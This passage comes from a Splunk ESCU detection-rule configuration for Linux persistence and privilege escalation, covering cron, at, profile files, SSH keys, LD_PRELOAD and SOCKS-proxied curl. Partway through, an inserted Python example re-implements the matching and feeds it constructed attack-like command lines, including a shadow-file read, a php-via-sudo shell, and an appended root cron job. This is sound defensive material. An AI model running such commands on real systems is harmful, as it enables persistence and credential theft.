["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("cat", "nano*","vim*", "vi*") AND Processes.process IN("*/etc/sudoers*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_access_to_sudoers_file_filter` [ESCU - Linux Possible Append Command To At Allow Config File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to identify suspicious command lines that may append user entries to either /etc/at.allow or /etc/at.deny. These files can be exploited by malicious actors for persistence on a compromised Linux host by altering permissions for scheduled tasks using the at command.\ In this context, an attacker can create a user or add an existing user to these configuration files to execute their malicious code through scheduled tasks. The detection of such anomalous behavior can serve as an effective indicator warranting further investigation to validate if the activity is indeed malicious or a false positive. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to identify suspicious command lines that may append user entries to either /etc/at.allow or /etc/at.deny. 
These files can be exploited by malicious actors for persistence on a compromised Linux host by altering permissions for scheduled tasks using the at command.\ In this context, an attacker can create a user or add an existing user to these configuration files to execute their malicious code through scheduled tasks. The detection of such anomalous behavior can serve as an effective indicator warranting further investigation to validate if the activity is indeed malicious or a false positive. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators may use this command line for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Append Command To At Allow Config File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A command line $process$ that may modify the at allow config file on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Append Command To At Allow Config File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*echo*" AND Processes.process IN("*/etc/at.allow", "*/etc/at.deny") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid |
`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_append_command_to_at_allow_config_file_filter` [ESCU - Linux Possible Append Command To Profile Config File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious command lines that may be used to modify user profile files so that the shell automatically executes scripts or executables when a user logs in or starts a new shell. This technique is commonly abused by adversaries, malware and red teamers as a persistence mechanism on the targeted or compromised host. This anomaly detection is a good indicator that someone wants code to run on every login, which administrators or network operators may also do for automation purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious command lines that may be used to modify user profile files so that the shell automatically executes scripts or executables when a user logs in or starts a new shell. This technique is commonly abused by adversaries, malware and red teamers as a persistence mechanism on the targeted or compromised host. This anomaly detection is a good indicator that someone wants code to run on every login, which administrators or network operators may also do for automation purposes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions.
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators may use this command line for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Append Command To Profile Config File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A command line $process$ that may modify profile files on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Append Command To Profile Config File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation
= greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*echo*" AND Processes.process IN("*~/.bashrc", "*~/.bash_profile", "*/etc/profile", "*~/.bash_login", "*~/.profile", "*~/.bash_logout") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_append_command_to_profile_config_file_filter` [ESCU - Linux Possible Append Cronjob Entry on Existing Cronjob File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect potential tampering with cronjob files on a Linux system. It specifically searches for command lines that may be used to append code to existing cronjob files, a technique often employed by adversaries, malware, and red teamers for persistence or privilege escalation. Altering existing or sometimes normal cronjob script files allows malicious code to be executed automatically.\ The analytic operates by monitoring logs for specific process names, parent processes, and command-line executions from your endpoints. It specifically checks for any 'echo' command which modifies files in directories commonly associated with cron jobs such as '/etc/cron*', '/var/spool/cron/', and '/etc/anacrontab'. If such activity is detected, an alert is triggered.\ This behavior is worth identifying for a SOC because malicious cron jobs can lead to system compromises and unauthorized data access, impacting business operations and data integrity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect potential tampering with cronjob files on a Linux system. It specifically searches for command lines that may be used to append code to existing cronjob files, a technique often employed by adversaries, malware, and red teamers for persistence or privilege escalation. Altering existing or sometimes normal cronjob script files allows malicious code to be executed automatically.\ The analytic operates by monitoring logs for specific process names, parent processes, and command-line executions from your endpoints. It specifically checks for any 'echo' command which modifies files in directories commonly associated with cron jobs such as '/etc/cron*', '/var/spool/cron/', and '/etc/anacrontab'. If such activity is detected, an alert is triggered.\ This behavior is worth identifying for a SOC because malicious cron jobs can lead to system compromises and unauthorized data access, impacting business operations and data integrity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = False positives may arise from legitimate actions by administrators or network operators who may use these commands for automation purposes. Therefore, it's recommended to adjust filter macros to eliminate such false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Append Cronjob Entry on Existing Cronjob File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Append Cronjob Entry on Existing Cronjob File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*echo*" AND Processes.process IN("*/etc/cron*", "*/var/spool/cron/*", "*/etc/anacrontab*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process
Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_append_cronjob_entry_on_existing_cronjob_file_filter` [ESCU - Linux Possible Cronjob Modification With Editor - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects potential unauthorized modifications to Linux cronjobs using text editors like "nano", "vi" or "vim". It identifies this behavior by tracking command-line executions that interact with paths related to cronjob configuration, a common Linux scheduling utility. Cronjob files may be manipulated by attackers for privilege escalation or persistent access, making such changes critical to monitor.\ The identified behavior is significant for a Security Operations Center (SOC) as it could indicate an ongoing attempt at establishing persistent access or privilege escalation, leading to data breaches, system compromise, or other malicious activities.\ In case of a true positive, the impact could be severe. An attacker with escalated privileges or persistent access could carry out damaging actions, such as data theft, sabotage, or further network penetration.\ To implement this analytic, ensure ingestion of logs tracking process name, parent process, and command-line executions from your endpoints. Utilize the Add-on for Linux Sysmon from Splunkbase if you're using Sysmon.\ Known false positives include legitimate administrative tasks, as these commands may also be used for benign purposes. Careful tuning and filtering based on known benign activity in your environment can minimize these instances. 
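The matching logic of the rules above (the PHP sudo rule, the three editor-access rules for sshd_config, credential files and sudoers, and the echo-append rules for at.allow/at.deny, profile files and cron files), re-implemented as an added example and run over constructed process events. This is not Splunk's code and not part of the ESCU content: only the `*` wildcard used by the page's searches is translated, into a whole-field, case-insensitive regex, which is assumed to match how Splunk evaluates those `where` clauses; the event field names follow Endpoint.Processes, the hostnames and command lines are constructed, and all six profile patterns are written with a leading `*` so the file name may follow other text. The example makes two properties of the published patterns visible: patterns without a trailing `*` (sshd_config, at.allow, at.deny) only fire when the path is the last thing on the recorded command line, and `vi*` also matches `visudo` and `vipw`, which edit sudoers and shadow without the path on their command line and so are never caught. Because a shell expands `~` before exec, the profile patterns only match when the literal tilde survives into the recorded command line, as it does inside a quoted `bash -c` string. The pkexec rule is left out: its closing `regex process="(^.{1}$)"` keeps only events whose process field is exactly one character, and what a given sensor writes for an argument-less pkexec is sensor-specific.

```python
"""Added example: Splunk-wildcard matching for several ESCU Linux rules, run
over constructed Endpoint.Processes-style events. Not Splunk's code."""
import re
from collections import defaultdict
from dataclasses import dataclass


def splunk_glob(pattern: str) -> "re.Pattern[str]":
    """Translate a Splunk wildcard pattern into a whole-field regex.

    Only '*' is special in the page's searches; everything else is literal.
    Case-insensitive matching is assumed, as for terms in a Splunk search.
    """
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE | re.DOTALL)


def matches_any(value: str, patterns: tuple) -> bool:
    """Equivalent of `field IN("p1", "p2", ...)` in a tstats where clause."""
    return any(splunk_glob(p).match(value) for p in patterns)


@dataclass(frozen=True)
class Rule:
    name: str
    process_name: tuple = ()  # Processes.process_name IN(...); empty = unconstrained
    process_all: tuple = ()   # each pattern ANDed against Processes.process
    process_any: tuple = ()   # Processes.process IN(...); empty = unconstrained
    dest_risk: int = 0        # risk_score of the rule's dest risk object

    def matches(self, ev: dict) -> bool:
        if self.process_name and not matches_any(ev["process_name"], self.process_name):
            return False
        if not all(splunk_glob(p).match(ev["process"]) for p in self.process_all):
            return False
        if self.process_any and not matches_any(ev["process"], self.process_any):
            return False
        return True


# Editor list shared by the three access rules; "vi*" also matches visudo, vipw, view.
EDITORS = ("cat", "nano*", "vim*", "vi*")

RULES = (
    Rule("Linux PHP Privilege Escalation",
         process_all=("*php*-r*", "*system*", "*sudo*"), dest_risk=30),
    Rule("Linux Possible Access Or Modification Of sshd Config File",
         process_name=EDITORS, process_any=("*/etc/ssh/sshd_config",), dest_risk=25),
    Rule("Linux Possible Access To Credential Files",
         process_name=EDITORS, process_any=("*/etc/shadow*", "*/etc/passwd*"), dest_risk=25),
    Rule("Linux Possible Access To Sudoers File",
         process_name=EDITORS, process_any=("*/etc/sudoers*",), dest_risk=25),
    Rule("Linux Possible Append Command To At Allow Config File",
         process_all=("*echo*",), process_any=("*/etc/at.allow", "*/etc/at.deny"), dest_risk=9),
    # Every profile pattern carries a leading '*' here (an assumption of this example).
    Rule("Linux Possible Append Command To Profile Config File",
         process_all=("*echo*",),
         process_any=("*~/.bashrc", "*~/.bash_profile", "*/etc/profile",
                      "*~/.bash_login", "*~/.profile", "*~/.bash_logout"),
         dest_risk=49),
    # The page defines no risk object for the cron rule, so it adds no score.
    Rule("Linux Possible Append Cronjob Entry on Existing Cronjob File",
         process_all=("*echo*",),
         process_any=("*/etc/cron*", "*/var/spool/cron/*", "*/etc/anacrontab*")),
)


def run_rules(events, rules=RULES):
    """Return (hits, risk_by_dest): hits as (rule name, dest, process) in event
    order, and the summed dest risk score, mirroring the dest risk object."""
    hits = []
    risk = defaultdict(int)
    for ev in events:
        for rule in rules:
            if rule.matches(ev):
                hits.append((rule.name, ev["dest"], ev["process"]))
                risk[ev["dest"]] += rule.dest_risk
    return hits, dict(risk)


# Constructed sample events. Command lines are written the way a sensor that
# joins argv with spaces records them (quotes consumed by the invoking shell).
SAMPLE_EVENTS = [
    {"dest": "web01", "user": "www-data", "process_name": "sudo",
     "process": "sudo php -r system('id');"},
    {"dest": "web01", "user": "www-data", "process_name": "cat", "process": "cat /etc/shadow"},
    {"dest": "web01", "user": "root", "process_name": "vim", "process": "vim /etc/ssh/sshd_config"},
    {"dest": "web01", "user": "root", "process_name": "nano", "process": "nano /etc/sudoers.d/ops"},
    {"dest": "build02", "user": "jenkins", "process_name": "sh",
     "process": "sh -c echo jenkins >> /etc/at.allow"},
    {"dest": "build02", "user": "jenkins", "process_name": "bash",
     "process": "bash -c echo * * * * * root /tmp/.x >> /etc/cron.d/backup"},
    {"dest": "dev03", "user": "alice", "process_name": "bash",
     "process": "bash -c echo /tmp/.p >> ~/.bash_login"},
    # Not caught: grep is not in the editor list, and vipw edits /etc/shadow
    # without the path ever appearing on its command line.
    {"dest": "dev03", "user": "alice", "process_name": "grep",
     "process": "grep -n Port /etc/ssh/sshd_config"},
    {"dest": "dev03", "user": "root", "process_name": "vipw", "process": "vipw -s"},
]

if __name__ == "__main__":
    hits, risk = run_rules(SAMPLE_EVENTS)
    for name, dest, proc in hits:
        print(f"{dest:8} {name}: {proc}")
    print(risk)
```

Running the block lists seven hits (four on web01, two on build02, one on dev03) and the per-host risk totals 105, 9 and 49; the grep and vipw events produce nothing, which is the coverage gap a practitioner should keep in mind when relying on these command-line patterns alone.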
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects potential unauthorized modifications to Linux cronjobs using text editors like "nano", "vi" or "vim". It identifies this behavior by tracking command-line executions that interact with paths related to the configuration of cron, a common Linux scheduling utility. Cronjob files may be manipulated by attackers for privilege escalation or persistent access, making such changes critical to monitor.\
The identified behavior is significant for a Security Operations Center (SOC) as it could indicate an ongoing attempt at establishing persistent access or privilege escalation, leading to data breaches, system compromise, or other malicious activities.\
In case of a true positive, the impact could be severe. An attacker with escalated privileges or persistent access could carry out damaging actions, such as data theft, sabotage, or further network penetration.\
To implement this analytic, ensure ingestion of logs tracking process name, parent process, and command-line executions from your endpoints. Utilize the Add-on for Linux Sysmon from Splunkbase if you're using Sysmon.\
Known false positives include legitimate administrative tasks, as these commands may also be used for benign purposes. Careful tuning and filtering based on known benign activity in your environment can minimize these instances.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can use this command line for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-17
action.escu.modification_date = 2021-12-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Possible Cronjob Modification With Editor - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Possible Cronjob Modification With Editor - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 20, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name IN("nano","vim.basic") OR Processes.process IN ("*nano *", "*vi *", "*vim *")) AND Processes.process IN("*/etc/cron*", "*/var/spool/cron/*", "*/etc/anacrontab*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_cronjob_modification_with_editor_filter`

[ESCU - Linux Possible Ssh Key File Creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for possible SSH key file creation in the ~/.ssh/ folder. This technique is commonly abused by threat actors and adversaries to gain persistence and privilege escalation on the targeted host: by creating an SSH private and public key pair and passing the public key to the attacker's server, the threat actor can access the machine remotely via the OpenSSH daemon service.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for possible SSH key file creation in the ~/.ssh/ folder. This technique is commonly abused by threat actors and adversaries to gain persistence and privilege escalation on the targeted host: by creating an SSH private and public key pair and passing the public key to the attacker's server, the threat actor can access the machine remotely via the OpenSSH daemon service.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase.
action.escu.known_false_positives = Administrators or network operators can create files in ~/.ssh folders for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2022-01-11
action.escu.modification_date = 2022-01-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Possible Ssh Key File Creation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Possible Ssh Key File Creation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/.ssh*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_possible_ssh_key_file_creation_filter`

[ESCU - Linux Preload Hijack Library Calls - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious command that may hijack a library function on the Linux platform. This technique is commonly abused by adversaries, malware authors and red teamers to gain privileges and persist on the machine. This detection pertains to loading a shared library to hijack or hook a library function of a specific program via the LD_PRELOAD environment variable.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.006", "T1574"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious command that may hijack a library function on the Linux platform. This technique is commonly abused by adversaries, malware authors and red teamers to gain privileges and persist on the machine. This detection pertains to loading a shared library to hijack or hook a library function of a specific program via the LD_PRELOAD environment variable.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-22
action.escu.modification_date = 2021-12-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Preload Hijack Library Calls - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = A command line $process$ that may hijack a library function on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Preload Hijack Library Calls - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.006", "T1574"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious command that may hijack a library function on the Linux platform. This technique is commonly abused by adversaries, malware authors and red teamers to gain privileges and persist on the machine. This detection pertains to loading a shared library to hijack or hook a library function of a specific program via the LD_PRELOAD environment variable.
action.notable.param.rule_title = Linux Preload Hijack Library Calls
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*LD_PRELOAD*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_preload_hijack_library_calls_filter`

[ESCU - Linux Proxy Socks Curl - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies curl being utilized with a proxy based on command-line arguments: -x, socks, --preproxy and --proxy. This behavior is built into the Metasploit Framework as an auxiliary module. What does SOCKS buy an adversary? SOCKS4a extends the SOCKS4 protocol to allow a client to specify a destination domain name rather than an IP address. The SOCKS5 protocol is defined in RFC 1928. It is an incompatible extension of the SOCKS4 protocol; it offers more choices for authentication and adds support for IPv6 and UDP, the latter of which can be used for DNS lookups. The protocols, and a proxy itself, allow an adversary to evade controls in place to monitor traffic, making it harder for the defender to identify and track activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1090", "T1095"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies curl being utilized with a proxy based on command-line arguments: -x, socks, --preproxy and --proxy. This behavior is built into the Metasploit Framework as an auxiliary module. What does SOCKS buy an adversary? SOCKS4a extends the SOCKS4 protocol to allow a client to specify a destination domain name rather than an IP address. The SOCKS5 protocol is defined in RFC 1928. It is an incompatible extension of the SOCKS4 protocol; it offers more choices for authentication and adds support for IPv6 and UDP, the latter of which can be used for DNS lookups. The protocols, and a proxy itself, allow an adversary to evade controls in place to monitor traffic, making it harder for the defender to identify and track activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present based on proxy usage internally. Filter as needed.
action.escu.creation_date = 2022-07-29
action.escu.modification_date = 2022-07-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Proxy Socks Curl - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Living Off The Land", "Ingress Tool Transfer"]
action.risk = 1
action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ utilizing a proxy. Review activity for further details.
